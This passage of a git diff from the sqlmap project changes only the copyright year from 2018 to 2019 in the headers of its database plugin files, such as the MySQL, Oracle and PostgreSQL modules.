 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py
index 9b353468691..2ccf0cb8c79 100644
--- a/plugins/dbms/firebird/filesystem.py
+++ b/plugins/dbms/firebird/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index a8f5d7fc92c..40ac7580cec 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index 15767b3a348..7c91e79cf6f 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py
index 967f193c6aa..9864414702e 100644
--- a/plugins/dbms/firebird/takeover.py
+++ b/plugins/dbms/firebird/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py
index c35662f6051..b38b098dd12 100644
--- a/plugins/dbms/h2/__init__.py
+++ b/plugins/dbms/h2/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py
index e9bc44f9edc..54e332c773f 100644
--- a/plugins/dbms/h2/connector.py
+++ b/plugins/dbms/h2/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py
index c4f9560a2ea..58e9ec71636 100644
--- a/plugins/dbms/h2/enumeration.py
+++ b/plugins/dbms/h2/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py
index b082a335ed5..cfbcee27cd5 100644
--- a/plugins/dbms/h2/filesystem.py
+++ b/plugins/dbms/h2/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py
index ba36ec1a810..6b6353ecc3b 100644
--- a/plugins/dbms/h2/fingerprint.py
+++ b/plugins/dbms/h2/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py
index aab5e6b6c8f..b98351c593d 100644
--- a/plugins/dbms/h2/syntax.py
+++ b/plugins/dbms/h2/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py
index 28d922d3f19..cb0f53cb271 100644
--- a/plugins/dbms/h2/takeover.py
+++ b/plugins/dbms/h2/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py
index bcbc831641d..c6f9c28f1dc 100644
--- a/plugins/dbms/hsqldb/__init__.py
+++ b/plugins/dbms/hsqldb/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py
index ee605409f27..7f272fb1eb9 100644
--- a/plugins/dbms/hsqldb/connector.py
+++ b/plugins/dbms/hsqldb/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py
index 78d94293d8d..9616d5cf65e 100644
--- a/plugins/dbms/hsqldb/enumeration.py
+++ b/plugins/dbms/hsqldb/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
index de9c14d9593..a8bdfa2a071 100644
--- a/plugins/dbms/hsqldb/filesystem.py
+++ b/plugins/dbms/hsqldb/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py
index 4fecfa648af..4b1245b40b0 100644
--- a/plugins/dbms/hsqldb/fingerprint.py
+++ b/plugins/dbms/hsqldb/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py
index aab5e6b6c8f..b98351c593d 100644
--- a/plugins/dbms/hsqldb/syntax.py
+++ b/plugins/dbms/hsqldb/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py
index dfa364d34e0..c3b09e34023 100644
--- a/plugins/dbms/hsqldb/takeover.py
+++ b/plugins/dbms/hsqldb/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py
index 0ae21bb3e6c..79a14664b86 100644
--- a/plugins/dbms/informix/__init__.py
+++ b/plugins/dbms/informix/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py
index f97ec1a7390..75928066671 100644
--- a/plugins/dbms/informix/connector.py
+++ b/plugins/dbms/informix/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py
index a41f881b4d8..985963fd924 100644
--- a/plugins/dbms/informix/enumeration.py
+++ b/plugins/dbms/informix/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py
index 4699cb9b634..4f0d86be78e 100644
--- a/plugins/dbms/informix/filesystem.py
+++ b/plugins/dbms/informix/filesystem.py
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py index e6ca564821c..a582a93d6a7 100644 --- a/plugins/dbms/informix/fingerprint.py +++ b/plugins/dbms/informix/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py index e3cbf0d6969..2bd9c9e338c 100644 --- a/plugins/dbms/informix/syntax.py +++ b/plugins/dbms/informix/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py index ba8026e8880..ca204b03495 100644 --- a/plugins/dbms/informix/takeover.py +++ b/plugins/dbms/informix/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 9834a60573c..77e9c5a2556 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 70295c3c5a0..dd8f76a3a66 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index b61946912cb..ccc09d04d25 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index ec4c5c2bab1..45fb2040c47 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index 0c6cb849662..4875a6e8bea 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index b946cfb04ad..c950f106474 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index 29f0b7ecc18..d3f2172e3bd 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index 02a23e967f9..acff62b9903 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index a39d05d9366..4987bfa43e8 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 7b89d60b4c1..e8a57f9fa42 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 6da84d561d1..105c49d2878 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 5fbf73680af..065e3bd25ec 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index f7f042af0d3..e93427e6330 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index 8d15b478fbf..0377c4d376d 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index b91bbefca74..2d267553831 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 184e2eaff18..8b64f322a37 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 65370fd4559..c375e891ef2 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1ddc716c7ad..07950d91cb8 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 092d97d3dcb..e6b69397a70 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index 61f145e5f52..b2ad286a96d 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 19207ba3e7c..a66d1231322 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index fa8b5368ecf..fd2c5f5afb8 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index 4f31e73089b..76d2087bf6a 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index 0ea903d6678..98154351619 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index aeb3a57f908..b4c8a176973 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 692d26fb1d9..3cf07e69716 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index bb442759deb..df00405104d 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index b5b381c6227..c716307cd90 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 41683881fda..a2153057482 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index e480d17dc5f..ac35c24b5f8 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index a5754895d42..c089fcba0f0 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index 46c3611be4d..d97b68db081 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index a4060687242..13867fd9da0 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 3ba144511f5..c83d3b4fc43 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 10b52a56c12..13edbbce162 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index 5f7e7922a8f..adb10a1b908 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index f214b39a32a..c406d2e07b2 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index f77f6feee5c..1af810a884d 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index 68937c506fd..190a7be8d9d 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index abaeeb2cb64..9fc3dcc3ec3 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers 